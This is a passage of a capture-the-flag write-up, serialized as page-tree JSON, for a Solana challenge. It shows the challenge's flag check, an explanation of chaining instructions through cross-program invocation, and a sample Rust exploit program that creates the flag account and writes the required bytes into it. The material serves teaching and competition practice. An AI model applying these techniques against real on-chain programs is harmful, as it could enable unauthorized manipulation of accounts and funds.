solve_ix",{"type":24,"tag":301,"props":49176,"children":49177},{"style":385},[49178],{"type":30,"value":2537},{"type":24,"tag":301,"props":49180,"children":49181},{"style":369},[49182],{"type":30,"value":48779},{"type":24,"tag":301,"props":49184,"children":49185},{"style":385},[49186],{"type":30,"value":206},{"type":24,"tag":301,"props":49188,"children":49189},{"style":314},[49190],{"type":30,"value":49191},"read_instruction",{"type":24,"tag":301,"props":49193,"children":49194},{"style":359},[49195],{"type":30,"value":48761},{"type":24,"tag":301,"props":49197,"children":49198},{"style":385},[49199],{"type":30,"value":10308},{"type":24,"tag":301,"props":49201,"children":49202},{"style":359},[49203],{"type":30,"value":49204},"ID)",{"type":24,"tag":301,"props":49206,"children":49207},{"style":385},[49208],{"type":30,"value":2003},{"type":24,"tag":301,"props":49210,"children":49211},{"style":359},[49212],{"type":30,"value":492},{"type":24,"tag":301,"props":49214,"children":49215},{"class":303,"line":320},[49216,49220,49224,49229,49233,49237,49241,49246,49250,49254,49258,49262,49267,49271,49275,49279,49283,49287,49291,49295],{"type":24,"tag":301,"props":49217,"children":49218},{"style":369},[49219],{"type":30,"value":48948},{"type":24,"tag":301,"props":49221,"children":49222},{"style":385},[49223],{"type":30,"value":206},{"type":24,"tag":301,"props":49225,"children":49226},{"style":314},[49227],{"type":30,"value":49228},"run_ixs_full",{"type":24,"tag":301,"props":49230,"children":49231},{"style":359},[49232],{"type":30,"value":362},{"type":24,"tag":301,"props":49234,"children":49235},{"style":385},[49236],{"type":30,"value":556},{"type":24,"tag":301,"props":49238,"children":49239},{"style":359},[49240],{"type":30,"value":541},{"type":24,"tag":301,"props":49242,"children":49243},{"style":369},[49244],{"type":30,"value":49245},"solve_ix",{"type":24,"tag":301,"props":49247,"children":49248},{"style":359},[49249],{"type":30,"value":551},{"type":24,"tag":301,"props":49251,"children":49252},{"style":385},[49253],{"type":30,"value":556},{"type":24,"tag":301,"props":49255,"children":49256},{"style":359},[49257],{"type":30,"value":541},{"type":24,"tag":301,"props":49259,"children":49260},{"style":385},[49261],{"type":30,"value":556},{"type":24,"tag":301,"props":49263,"children":49264},{"style":369},[49265],{"type":30,"value":49266},"user_keypair",{"type":24,"tag":301,"props":49268,"children":49269},{"style":359},[49270],{"type":30,"value":551},{"type":24,"tag":301,"props":49272,"children":49273},{"style":385},[49274],{"type":30,"value":556},{"type":24,"tag":301,"props":49276,"children":49277},{"style":369},[49278],{"type":30,"value":27003},{"type":24,"tag":301,"props":49280,"children":49281},{"style":359},[49282],{"type":30,"value":9961},{"type":24,"tag":301,"props":49284,"children":49285},{"style":385},[49286],{"type":30,"value":206},{"type":24,"tag":301,"props":49288,"children":49289},{"style":308},[49290],{"type":30,"value":39666},{"type":24,"tag":301,"props":49292,"children":49293},{"style":385},[49294],{"type":30,"value":2003},{"type":24,"tag":301,"props":49296,"children":49297},{"style":359},[49298],{"type":30,"value":492},{"type":24,"tag":6246,"props":49300,"children":49301},{"start":344},[49302],{"type":24,"tag":2659,"props":49303,"children":49304},{},[49305],{"type":30,"value":49306},"Checks that the account at PDA(\"FLAG\") exists, has a data length of 0x1337 and the first 8 bytes are equal to 0x4337. If so, it prints the flag.",{"type":24,"tag":291,"props":49308,"children":49310},{"className":9818,"code":49309,"language":9817,"meta":7,"style":7},"let flag = Pubkey::create_program_address(&[\"FLAG\".as_ref()], &chall::ID)?;\nif let Some(acct) = chall.ctx.banks_client.get_account(flag).await? {\n if acct.data.len() == 0x1337\n && u64::from_le_bytes(acct.data[..8].try_into().unwrap()) == 0x4337\n {\n writeln!(socket, \"congrats!\")?;\n if let Ok(flag) = env::var(\"FLAG\") {\n writeln!(socket, \"flag: {:?}\", flag)?;\n } else {\n writeln!(socket, \"flag not found, please contact admin\")?;\n }\n }\n}\n",[49311],{"type":24,"tag":145,"props":49312,"children":49313},{"__ignoreMap":7},[49314,49398,49489,49530,49614,49621,49658,49715,49760,49775,49811,49818,49825],{"type":24,"tag":301,"props":49315,"children":49316},{"class":303,"line":304},[49317,49321,49326,49330,49334,49338,49343,49347,49351,49355,49360,49364,49369,49374,49378,49382,49386,49390,49394],{"type":24,"tag":301,"props":49318,"children":49319},{"style":348},[49320],{"type":30,"value":3258},{"type":24,"tag":301,"props":49322,"children":49323},{"style":369},[49324],{"type":30,"value":49325}," flag",{"type":24,"tag":301,"props":49327,"children":49328},{"style":385},[49329],{"type":30,"value":2537},{"type":24,"tag":301,"props":49331,"children":49332},{"style":10246},[49333],{"type":30,"value":27626},{"type":24,"tag":301,"props":49335,"children":49336},{"style":385},[49337],{"type":30,"value":10308},{"type":24,"tag":301,"props":49339,"children":49340},{"style":314},[49341],{"type":30,"value":49342},"create_program_address",{"type":24,"tag":301,"props":49344,"children":49345},{"style":359},[49346],{"type":30,"value":362},{"type":24,"tag":301,"props":49348,"children":49349},{"style":385},[49350],{"type":30,"value":556},{"type":24,"tag":301,"props":49352,"children":49353},{"style":359},[49354],{"type":30,"value":541},{"type":24,"tag":301,"props":49356,"children":49357},{"style":329},[49358],{"type":30,"value":49359},"\"FLAG\"",{"type":24,"tag":301,"props":49361,"children":49362},{"style":385},[49363],{"type":30,"value":206},{"type":24,"tag":301,"props":49365,"children":49366},{"style":314},[49367],{"type":30,"value":49368},"as_ref",{"type":24,"tag":301,"props":49370,"children":49371},{"style":359},[49372],{"type":30,"value":49373},"()], ",{"type":24,"tag":301,"props":49375,"children":49376},{"style":385},[49377],{"type":30,"value":556},{"type":24,"tag":301,"props":49379,"children":49380},{"style":359},[49381],{"type":30,"value":48948},{"type":24,"tag":301,"props":49383,"children":49384},{"style":385},[49385],{"type":30,"value":10308},{"type":24,"tag":301,"props":49387,"children":49388},{"style":359},[49389],{"type":30,"value":49204},{"type":24,"tag":301,"props":49391,"children":49392},{"style":385},[49393],{"type":30,"value":2003},{"type":24,"tag":301,"props":49395,"children":49396},{"style":359},[49397],{"type":30,"value":492},{"type":24,"tag":301,"props":49399,"children":49400},{"class":303,"line":320},[49401,49405,49409,49413,49417,49422,49426,49430,49434,49438,49442,49446,49451,49455,49460,49464,49469,49473,49477,49481,49485],{"type":24,"tag":301,"props":49402,"children":49403},{"style":308},[49404],{"type":30,"value":22368},{"type":24,"tag":301,"props":49406,"children":49407},{"style":348},[49408],{"type":30,"value":34060},{"type":24,"tag":301,"props":49410,"children":49411},{"style":10246},[49412],{"type":30,"value":34065},{"type":24,"tag":301,"props":49414,"children":49415},{"style":359},[49416],{"type":30,"value":362},{"type":24,"tag":301,"props":49418,"children":49419},{"style":369},[49420],{"type":30,"value":49421},"acct",{"type":24,"tag":301,"props":49423,"children":49424},{"style":359},[49425],{"type":30,"value":911},{"type":24,"tag":301,"props":49427,"children":49428},{"style":385},[49429],{"type":30,"value":523},{"type":24,"tag":301,"props":49431,"children":49432},{"style":369},[49433],{"type":30,"value":48779},{"type":24,"tag":301,"props":49435,"children":49436},{"style":385},[49437],{"type":30,"value":206},{"type":24,"tag":301,"props":49439,"children":49440},{"style":359},[49441],{"type":30,"value":27051},{"type":24,"tag":301,"props":49443,"children":49444},{"style":385},[49445],{"type":30,"value":206},{"type":24,"tag":301,"props":49447,"children":49448},{"style":359},[49449],{"type":30,"value":49450},"banks_client",{"type":24,"tag":301,"props":49452,"children":49453},{"style":385},[49454],{"type":30,"value":206},{"type":24,"tag":301,"props":49456,"children":49457},{"style":314},[49458],{"type":30,"value":49459},"get_account",{"type":24,"tag":301,"props":49461,"children":49462},{"style":359},[49463],{"type":30,"value":362},{"type":24,"tag":301,"props":49465,"children":49466},{"style":369},[49467],{"type":30,"value":49468},"flag",{"type":24,"tag":301,"props":49470,"children":49471},{"style":359},[49472],{"type":30,"value":9961},{"type":24,"tag":301,"props":49474,"children":49475},{"style":385},[49476],{"type":30,"value":206},{"type":24,"tag":301,"props":49478,"children":49479},{"style":308},[49480],{"type":30,"value":39666},{"type":24,"tag":301,"props":49482,"children":49483},{"style":385},[49484],{"type":30,"value":2003},{"type":24,"tag":301,"props":49486,"children":49487},{"style":359},[49488],{"type":30,"value":3035},{"type":24,"tag":301,"props":49490,"children":49491},{"class":303,"line":335},[49492,49496,49501,49505,49509,49513,49517,49521,49525],{"type":24,"tag":301,"props":49493,"children":49494},{"style":308},[49495],{"type":30,"value":453},{"type":24,"tag":301,"props":49497,"children":49498},{"style":369},[49499],{"type":30,"value":49500}," acct",{"type":24,"tag":301,"props":49502,"children":49503},{"style":385},[49504],{"type":30,"value":206},{"type":24,"tag":301,"props":49506,"children":49507},{"style":359},[49508],{"type":30,"value":10528},{"type":24,"tag":301,"props":49510,"children":49511},{"style":385},[49512],{"type":30,"value":206},{"type":24,"tag":301,"props":49514,"children":49515},{"style":314},[49516],{"type":30,"value":6156},{"type":24,"tag":301,"props":49518,"children":49519},{"style":359},[49520],{"type":30,"value":20835},{"type":24,"tag":301,"props":49522,"children":49523},{"style":385},[49524],{"type":30,"value":607},{"type":24,"tag":301,"props":49526,"children":49527},{"style":466},[49528],{"type":30,"value":49529}," 0x1337\n",{"type":24,"tag":301,"props":49531,"children":49532},{"class":303,"line":344},[49533,49538,49542,49546,49551,49555,49559,49563,49568,49572,49576,49580,49584,49588,49592,49596,49600,49605,49609],{"type":24,"tag":301,"props":49534,"children":49535},{"style":385},[49536],{"type":30,"value":49537}," &&",{"type":24,"tag":301,"props":49539,"children":49540},{"style":10246},[49541],{"type":30,"value":12680},{"type":24,"tag":301,"props":49543,"children":49544},{"style":385},[49545],{"type":30,"value":10308},{"type":24,"tag":301,"props":49547,"children":49548},{"style":314},[49549],{"type":30,"value":49550},"from_le_bytes",{"type":24,"tag":301,"props":49552,"children":49553},{"style":359},[49554],{"type":30,"value":362},{"type":24,"tag":301,"props":49556,"children":49557},{"style":369},[49558],{"type":30,"value":49421},{"type":24,"tag":301,"props":49560,"children":49561},{"style":385},[49562],{"type":30,"value":206},{"type":24,"tag":301,"props":49564,"children":49565},{"style":359},[49566],{"type":30,"value":49567},"data[",{"type":24,"tag":301,"props":49569,"children":49570},{"style":385},[49571],{"type":30,"value":9887},{"type":24,"tag":301,"props":49573,"children":49574},{"style":466},[49575],{"type":30,"value":10900},{"type":24,"tag":301,"props":49577,"children":49578},{"style":359},[49579],{"type":30,"value":22200},{"type":24,"tag":301,"props":49581,"children":49582},{"style":385},[49583],{"type":30,"value":206},{"type":24,"tag":301,"props":49585,"children":49586},{"style":314},[49587],{"type":30,"value":32918},{"type":24,"tag":301,"props":49589,"children":49590},{"style":359},[49591],{"type":30,"value":20672},{"type":24,"tag":301,"props":49593,"children":49594},{"style":385},[49595],{"type":30,"value":206},{"type":24,"tag":301,"props":49597,"children":49598},{"style":314},[49599],{"type":30,"value":10492},{"type":24,"tag":301,"props":49601,"children":49602},{"style":359},[49603],{"type":30,"value":49604},"()) ",{"type":24,"tag":301,"props":49606,"children":49607},{"style":385},[49608],{"type":30,"value":607},{"type":24,"tag":301,"props":49610,"children":49611},{"style":466},[49612],{"type":30,"value":49613}," 0x4337\n",{"type":24,"tag":301,"props":49615,"children":49616},{"class":303,"line":401},[49617],{"type":24,"tag":301,"props":49618,"children":49619},{"style":359},[49620],{"type":30,"value":35943},{"type":24,"tag":301,"props":49622,"children":49623},{"class":303,"line":415},[49624,49629,49633,49637,49641,49646,49650,49654],{"type":24,"tag":301,"props":49625,"children":49626},{"style":314},[49627],{"type":30,"value":49628}," writeln!",{"type":24,"tag":301,"props":49630,"children":49631},{"style":359},[49632],{"type":30,"value":362},{"type":24,"tag":301,"props":49634,"children":49635},{"style":369},[49636],{"type":30,"value":48674},{"type":24,"tag":301,"props":49638,"children":49639},{"style":359},[49640],{"type":30,"value":377},{"type":24,"tag":301,"props":49642,"children":49643},{"style":329},[49644],{"type":30,"value":49645},"\"congrats!\"",{"type":24,"tag":301,"props":49647,"children":49648},{"style":359},[49649],{"type":30,"value":9961},{"type":24,"tag":301,"props":49651,"children":49652},{"style":385},[49653],{"type":30,"value":2003},{"type":24,"tag":301,"props":49655,"children":49656},{"style":359},[49657],{"type":30,"value":492},{"type":24,"tag":301,"props":49659,"children":49660},{"class":303,"line":439},[49661,49665,49669,49674,49678,49682,49686,49690,49695,49699,49703,49707,49711],{"type":24,"tag":301,"props":49662,"children":49663},{"style":308},[49664],{"type":30,"value":3285},{"type":24,"tag":301,"props":49666,"children":49667},{"style":348},[49668],{"type":30,"value":34060},{"type":24,"tag":301,"props":49670,"children":49671},{"style":10246},[49672],{"type":30,"value":49673}," Ok",{"type":24,"tag":301,"props":49675,"children":49676},{"style":359},[49677],{"type":30,"value":362},{"type":24,"tag":301,"props":49679,"children":49680},{"style":369},[49681],{"type":30,"value":49468},{"type":24,"tag":301,"props":49683,"children":49684},{"style":359},[49685],{"type":30,"value":911},{"type":24,"tag":301,"props":49687,"children":49688},{"style":385},[49689],{"type":30,"value":523},{"type":24,"tag":301,"props":49691,"children":49692},{"style":359},[49693],{"type":30,"value":49694}," env",{"type":24,"tag":301,"props":49696,"children":49697},{"style":385},[49698],{"type":30,"value":10308},{"type":24,"tag":301,"props":49700,"children":49701},{"style":314},[49702],{"type":30,"value":41795},{"type":24,"tag":301,"props":49704,"children":49705},{"style":359},[49706],{"type":30,"value":362},{"type":24,"tag":301,"props":49708,"children":49709},{"style":329},[49710],{"type":30,"value":49359},{"type":24,"tag":301,"props":49712,"children":49713},{"style":359},[49714],{"type":30,"value":398},{"type":24,"tag":301,"props":49716,"children":49717},{"class":303,"line":447},[49718,49723,49727,49731,49735,49740,49744,49748,49752,49756],{"type":24,"tag":301,"props":49719,"children":49720},{"style":314},[49721],{"type":30,"value":49722}," writeln!",{"type":24,"tag":301,"props":49724,"children":49725},{"style":359},[49726],{"type":30,"value":362},{"type":24,"tag":301,"props":49728,"children":49729},{"style":369},[49730],{"type":30,"value":48674},{"type":24,"tag":301,"props":49732,"children":49733},{"style":359},[49734],{"type":30,"value":377},{"type":24,"tag":301,"props":49736,"children":49737},{"style":329},[49738],{"type":30,"value":49739},"\"flag: {:?}\"",{"type":24,"tag":301,"props":49741,"children":49742},{"style":359},[49743],{"type":30,"value":377},{"type":24,"tag":301,"props":49745,"children":49746},{"style":369},[49747],{"type":30,"value":49468},{"type":24,"tag":301,"props":49749,"children":49750},{"style":359},[49751],{"type":30,"value":9961},{"type":24,"tag":301,"props":49753,"children":49754},{"style":385},[49755],{"type":30,"value":2003},{"type":24,"tag":301,"props":49757,"children":49758},{"style":359},[49759],{"type":30,"value":492},{"type":24,"tag":301,"props":49761,"children":49762},{"class":303,"line":476},[49763,49767,49771],{"type":24,"tag":301,"props":49764,"children":49765},{"style":359},[49766],{"type":30,"value":10139},{"type":24,"tag":301,"props":49768,"children":49769},{"style":308},[49770],{"type":30,"value":10144},{"type":24,"tag":301,"props":49772,"children":49773},{"style":359},[49774],{"type":30,"value":3035},{"type":24,"tag":301,"props":49776,"children":49777},{"class":303,"line":495},[49778,49782,49786,49790,49794,49799,49803,49807],{"type":24,"tag":301,"props":49779,"children":49780},{"style":314},[49781],{"type":30,"value":49722},{"type":24,"tag":301,"props":49783,"children":49784},{"style":359},[49785],{"type":30,"value":362},{"type":24,"tag":301,"props":49787,"children":49788},{"style":369},[49789],{"type":30,"value":48674},{"type":24,"tag":301,"props":49791,"children":49792},{"style":359},[49793],{"type":30,"value":377},{"type":24,"tag":301,"props":49795,"children":49796},{"style":329},[49797],{"type":30,"value":49798},"\"flag not found, please contact admin\"",{"type":24,"tag":301,"props":49800,"children":49801},{"style":359},[49802],{"type":30,"value":9961},{"type":24,"tag":301,"props":49804,"children":49805},{"style":385},[49806],{"type":30,"value":2003},{"type":24,"tag":301,"props":49808,"children":49809},{"style":359},[49810],{"type":30,"value":492},{"type":24,"tag":301,"props":49812,"children":49813},{"class":303,"line":504},[49814],{"type":24,"tag":301,"props":49815,"children":49816},{"style":359},[49817],{"type":30,"value":3345},{"type":24,"tag":301,"props":49819,"children":49820},{"class":303,"line":512},[49821],{"type":24,"tag":301,"props":49822,"children":49823},{"style":359},[49824],{"type":30,"value":501},{"type":24,"tag":301,"props":49826,"children":49827},{"class":303,"line":592},[49828],{"type":24,"tag":301,"props":49829,"children":49830},{"style":359},[49831],{"type":30,"value":698},{"type":24,"tag":43,"props":49833,"children":49835},{"id":49834},"solution-idea",[49836],{"type":30,"value":49837},"Solution Idea",{"type":24,"tag":32,"props":49839,"children":49840},{},[49841,49843,49848],{"type":30,"value":49842},"You may think it's impossible to do with just one instruction, but we can actually leverage the ",{"type":24,"tag":145,"props":49844,"children":49846},{"className":49845},[],[49847],{"type":30,"value":42425},{"type":30,"value":49849}," function to execute infinite instructions. Well -- not entirely infinite, as we are limited by the amount of data we can pass to the on-chain program, and by the maximum stack depth of the Solana VM -- but we can execute up to 64 instructions, which is more than enough to get the flag.",{"type":24,"tag":32,"props":49851,"children":49852},{},[49853,49855,49861],{"type":30,"value":49854},"In order to get the flag, we need to make sure that the account at ",{"type":24,"tag":145,"props":49856,"children":49858},{"className":49857},[],[49859],{"type":30,"value":49860},"PDA(\"FLAG\")",{"type":30,"value":49862}," exists, has a data length of 0x1337, and the first 8 bytes are equal to 0x4337.",{"type":24,"tag":32,"props":49864,"children":49865},{},[49866,49868,49875],{"type":30,"value":49867},"Essentially, we need to ",{"type":24,"tag":188,"props":49869,"children":49872},{"href":49870,"rel":49871},"https://docs.solana.com/developing/runtime-facilities/programs#system-program",[192],[49873],{"type":30,"value":49874},"invoke the System Program",{"type":30,"value":49876},", and write controlled data into the newly created account.",{"type":24,"tag":32,"props":49878,"children":49879},{},[49880],{"type":30,"value":49881},"A sample program that does this is as follows:",{"type":24,"tag":291,"props":49883,"children":49885},{"className":9818,"code":49884,"language":9817,"meta":7,"style":7},"pub fn process_instruction(\n program_id: &Pubkey,\n accounts: &[AccountInfo],\n data: &[u8]\n) -> ProgramResult {\n let flag_pda_ai = &accounts[0];\n let user_ai = &accounts[1];\n\n // Step 1: Create a new account with 0x1337 bytes of data\n let instruction = Instruction::new_with_bincode(\n system_program::ID,\n &SystemInstruction::CreateAccount {\n space: 0x1337,\n lamports: Rent::default().minimum_balance(0x1337),\n owner: chall::ID\n },\n vec![\n AccountMeta::new(*user_ai.key, true),\n AccountMeta::new(*flag_pda_ai.key, true),\n ],\n );\n invoke_signed_unchecked(\n &instruction,\n &[\n user_ai.clone(),\n flag_pda_ai.clone(),\n ],\n &[&[\"FLAG\".as_ref()]],\n )?;\n\n // Step 2: Write 0x4337 to the first 8 bytes of the account\n flag_pda_ai.try_borrow_mut_data()?[..8].copy_from_slice(&0x4337u64.to_le_bytes());\n\n Ok(())\n}\n",[49886],{"type":24,"tag":145,"props":49887,"children":49888},{"__ignoreMap":7},[49889,49909,49933,49961,49989,50009,50045,50081,50088,50096,50129,50146,50171,50192,50243,50268,50275,50288,50334,50378,50385,50392,50403,50419,50430,50450,50470,50477,50513,50528,50535,50543,50622,50629,50640],{"type":24,"tag":301,"props":49890,"children":49891},{"class":303,"line":304},[49892,49896,49900,49905],{"type":24,"tag":301,"props":49893,"children":49894},{"style":348},[49895],{"type":30,"value":20484},{"type":24,"tag":301,"props":49897,"children":49898},{"style":348},[49899],{"type":30,"value":20489},{"type":24,"tag":301,"props":49901,"children":49902},{"style":314},[49903],{"type":30,"value":49904}," process_instruction",{"type":24,"tag":301,"props":49906,"children":49907},{"style":359},[49908],{"type":30,"value":1707},{"type":24,"tag":301,"props":49910,"children":49911},{"class":303,"line":320},[49912,49917,49921,49925,49929],{"type":24,"tag":301,"props":49913,"children":49914},{"style":369},[49915],{"type":30,"value":49916}," program_id",{"type":24,"tag":301,"props":49918,"children":49919},{"style":385},[49920],{"type":30,"value":1679},{"type":24,"tag":301,"props":49922,"children":49923},{"style":385},[49924],{"type":30,"value":991},{"type":24,"tag":301,"props":49926,"children":49927},{"style":10246},[49928],{"type":30,"value":28167},{"type":24,"tag":301,"props":49930,"children":49931},{"style":359},[49932],{"type":30,"value":1729},{"type":24,"tag":301,"props":49934,"children":49935},{"class":303,"line":335},[49936,49941,49945,49949,49953,49957],{"type":24,"tag":301,"props":49937,"children":49938},{"style":369},[49939],{"type":30,"value":49940}," accounts",{"type":24,"tag":301,"props":49942,"children":49943},{"style":385},[49944],{"type":30,"value":1679},{"type":24,"tag":301,"props":49946,"children":49947},{"style":385},[49948],{"type":30,"value":991},{"type":24,"tag":301,"props":49950,"children":49951},{"style":359},[49952],{"type":30,"value":541},{"type":24,"tag":301,"props":49954,"children":49955},{"style":10246},[49956],{"type":30,"value":21729},{"type":24,"tag":301,"props":49958,"children":49959},{"style":359},[49960],{"type":30,"value":21055},{"type":24,"tag":301,"props":49962,"children":49963},{"class":303,"line":344},[49964,49969,49973,49977,49981,49985],{"type":24,"tag":301,"props":49965,"children":49966},{"style":369},[49967],{"type":30,"value":49968}," data",{"type":24,"tag":301,"props":49970,"children":49971},{"style":385},[49972],{"type":30,"value":1679},{"type":24,"tag":301,"props":49974,"children":49975},{"style":385},[49976],{"type":30,"value":991},{"type":24,"tag":301,"props":49978,"children":49979},{"style":359},[49980],{"type":30,"value":541},{"type":24,"tag":301,"props":49982,"children":49983},{"style":10246},[49984],{"type":30,"value":10249},{"type":24,"tag":301,"props":49986,"children":49987},{"style":359},[49988],{"type":30,"value":4059},{"type":24,"tag":301,"props":49990,"children":49991},{"class":303,"line":401},[49992,49996,50000,50005],{"type":24,"tag":301,"props":49993,"children":49994},{"style":359},[49995],{"type":30,"value":911},{"type":24,"tag":301,"props":49997,"children":49998},{"style":385},[49999],{"type":30,"value":882},{"type":24,"tag":301,"props":50001,"children":50002},{"style":10246},[50003],{"type":30,"value":50004}," ProgramResult",{"type":24,"tag":301,"props":50006,"children":50007},{"style":359},[50008],{"type":30,"value":3035},{"type":24,"tag":301,"props":50010,"children":50011},{"class":303,"line":415},[50012,50016,50021,50025,50029,50033,50037,50041],{"type":24,"tag":301,"props":50013,"children":50014},{"style":348},[50015],{"type":30,"value":9838},{"type":24,"tag":301,"props":50017,"children":50018},{"style":369},[50019],{"type":30,"value":50020}," flag_pda_ai",{"type":24,"tag":301,"props":50022,"children":50023},{"style":385},[50024],{"type":30,"value":2537},{"type":24,"tag":301,"props":50026,"children":50027},{"style":385},[50028],{"type":30,"value":991},{"type":24,"tag":301,"props":50030,"children":50031},{"style":369},[50032],{"type":30,"value":21467},{"type":24,"tag":301,"props":50034,"children":50035},{"style":359},[50036],{"type":30,"value":541},{"type":24,"tag":301,"props":50038,"children":50039},{"style":466},[50040],{"type":30,"value":584},{"type":24,"tag":301,"props":50042,"children":50043},{"style":359},[50044],{"type":30,"value":1423},{"type":24,"tag":301,"props":50046,"children":50047},{"class":303,"line":439},[50048,50052,50057,50061,50065,50069,50073,50077],{"type":24,"tag":301,"props":50049,"children":50050},{"style":348},[50051],{"type":30,"value":9838},{"type":24,"tag":301,"props":50053,"children":50054},{"style":369},[50055],{"type":30,"value":50056}," user_ai",{"type":24,"tag":301,"props":50058,"children":50059},{"style":385},[50060],{"type":30,"value":2537},{"type":24,"tag":301,"props":50062,"children":50063},{"style":385},[50064],{"type":30,"value":991},{"type":24,"tag":301,"props":50066,"children":50067},{"style":369},[50068],{"type":30,"value":21467},{"type":24,"tag":301,"props":50070,"children":50071},{"style":359},[50072],{"type":30,"value":541},{"type":24,"tag":301,"props":50074,"children":50075},{"style":466},[50076],{"type":30,"value":546},{"type":24,"tag":301,"props":50078,"children":50079},{"style":359},[50080],{"type":30,"value":1423},{"type":24,"tag":301,"props":50082,"children":50083},{"class":303,"line":447},[50084],{"type":24,"tag":301,"props":50085,"children":50086},{"emptyLinePlaceholder":16},[50087],{"type":30,"value":341},{"type":24,"tag":301,"props":50089,"children":50090},{"class":303,"line":476},[50091],{"type":24,"tag":301,"props":50092,"children":50093},{"style":1062},[50094],{"type":30,"value":50095}," // Step 1: Create a new account with 0x1337 bytes of data\n",{"type":24,"tag":301,"props":50097,"children":50098},{"class":303,"line":495},[50099,50103,50108,50112,50116,50120,50125],{"type":24,"tag":301,"props":50100,"children":50101},{"style":348},[50102],{"type":30,"value":9838},{"type":24,"tag":301,"props":50104,"children":50105},{"style":369},[50106],{"type":30,"value":50107}," instruction",{"type":24,"tag":301,"props":50109,"children":50110},{"style":385},[50111],{"type":30,"value":2537},{"type":24,"tag":301,"props":50113,"children":50114},{"style":10246},[50115],{"type":30,"value":47747},{"type":24,"tag":301,"props":50117,"children":50118},{"style":385},[50119],{"type":30,"value":10308},{"type":24,"tag":301,"props":50121,"children":50122},{"style":314},[50123],{"type":30,"value":50124},"new_with_bincode",{"type":24,"tag":301,"props":50126,"children":50127},{"style":359},[50128],{"type":30,"value":1707},{"type":24,"tag":301,"props":50130,"children":50131},{"class":303,"line":504},[50132,50137,50141],{"type":24,"tag":301,"props":50133,"children":50134},{"style":359},[50135],{"type":30,"value":50136}," system_program",{"type":24,"tag":301,"props":50138,"children":50139},{"style":385},[50140],{"type":30,"value":10308},{"type":24,"tag":301,"props":50142,"children":50143},{"style":359},[50144],{"type":30,"value":50145},"ID,\n",{"type":24,"tag":301,"props":50147,"children":50148},{"class":303,"line":512},[50149,50153,50158,50162,50167],{"type":24,"tag":301,"props":50150,"children":50151},{"style":385},[50152],{"type":30,"value":10298},{"type":24,"tag":301,"props":50154,"children":50155},{"style":359},[50156],{"type":30,"value":50157},"SystemInstruction",{"type":24,"tag":301,"props":50159,"children":50160},{"style":385},[50161],{"type":30,"value":10308},{"type":24,"tag":301,"props":50163,"children":50164},{"style":10246},[50165],{"type":30,"value":50166},"CreateAccount",{"type":24,"tag":301,"props":50168,"children":50169},{"style":359},[50170],{"type":30,"value":3035},{"type":24,"tag":301,"props":50172,"children":50173},{"class":303,"line":592},[50174,50179,50183,50188],{"type":24,"tag":301,"props":50175,"children":50176},{"style":369},[50177],{"type":30,"value":50178}," space",{"type":24,"tag":301,"props":50180,"children":50181},{"style":385},[50182],{"type":30,"value":1679},{"type":24,"tag":301,"props":50184,"children":50185},{"style":466},[50186],{"type":30,"value":50187}," 0x1337",{"type":24,"tag":301,"props":50189,"children":50190},{"style":359},[50191],{"type":30,"value":1729},{"type":24,"tag":301,"props":50193,"children":50194},{"class":303,"line":619},[50195,50200,50204,50209,50213,50218,50222,50226,50231,50235,50239],{"type":24,"tag":301,"props":50196,"children":50197},{"style":369},[50198],{"type":30,"value":50199}," lamports",{"type":24,"tag":301,"props":50201,"children":50202},{"style":385},[50203],{"type":30,"value":1679},{"type":24,"tag":301,"props":50205,"children":50206},{"style":359},[50207],{"type":30,"value":50208}," Rent",{"type":24,"tag":301,"props":50210,"children":50211},{"style":385},[50212],{"type":30,"value":10308},{"type":24,"tag":301,"props":50214,"children":50215},{"style":314},[50216],{"type":30,"value":50217},"default",{"type":24,"tag":301,"props":50219,"children":50220},{"style":359},[50221],{"type":30,"value":20672},{"type":24,"tag":301,"props":50223,"children":50224},{"style":385},[50225],{"type":30,"value":206},{"type":24,"tag":301,"props":50227,"children":50228},{"style":314},[50229],{"type":30,"value":50230},"minimum_balance",{"type":24,"tag":301,"props":50232,"children":50233},{"style":359},[50234],{"type":30,"value":362},{"type":24,"tag":301,"props":50236,"children":50237},{"style":466},[50238],{"type":30,"value":8221},{"type":24,"tag":301,"props":50240,"children":50241},{"style":359},[50242],{"type":30,"value":4656},{"type":24,"tag":301,"props":50244,"children":50245},{"class":303,"line":635},[50246,50251,50255,50259,50263],{"type":24,"tag":301,"props":50247,"children":50248},{"style":369},[50249],{"type":30,"value":50250}," owner",{"type":24,"tag":301,"props":50252,"children":50253},{"style":385},[50254],{"type":30,"value":1679},{"type":24,"tag":301,"props":50256,"children":50257},{"style":359},[50258],{"type":30,"value":48779},{"type":24,"tag":301,"props":50260,"children":50261},{"style":385},[50262],{"type":30,"value":10308},{"type":24,"tag":301,"props":50264,"children":50265},{"style":359},[50266],{"type":30,"value":50267},"ID\n",{"type":24,"tag":301,"props":50269,"children":50270},{"class":303,"line":643},[50271],{"type":24,"tag":301,"props":50272,"children":50273},{"style":359},[50274],{"type":30,"value":32129},{"type":24,"tag":301,"props":50276,"children":50277},{"class":303,"line":652},[50278,50283],{"type":24,"tag":301,"props":50279,"children":50280},{"style":314},[50281],{"type":30,"value":50282}," vec!",{"type":24,"tag":301,"props":50284,"children":50285},{"style":359},[50286],{"type":30,"value":50287},"[\n",{"type":24,"tag":301,"props":50289,"children":50290},{"class":303,"line":666},[50291,50296,50300,50304,50308,50312,50317,50321,50326,50330],{"type":24,"tag":301,"props":50292,"children":50293},{"style":359},[50294],{"type":30,"value":50295}," AccountMeta",{"type":24,"tag":301,"props":50297,"children":50298},{"style":385},[50299],{"type":30,"value":10308},{"type":24,"tag":301,"props":50301,"children":50302},{"style":314},[50303],{"type":30,"value":21913},{"type":24,"tag":301,"props":50305,"children":50306},{"style":359},[50307],{"type":30,"value":362},{"type":24,"tag":301,"props":50309,"children":50310},{"style":385},[50311],{"type":30,"value":772},{"type":24,"tag":301,"props":50313,"children":50314},{"style":369},[50315],{"type":30,"value":50316},"user_ai",{"type":24,"tag":301,"props":50318,"children":50319},{"style":385},[50320],{"type":30,"value":206},{"type":24,"tag":301,"props":50322,"children":50323},{"style":359},[50324],{"type":30,"value":50325},"key, 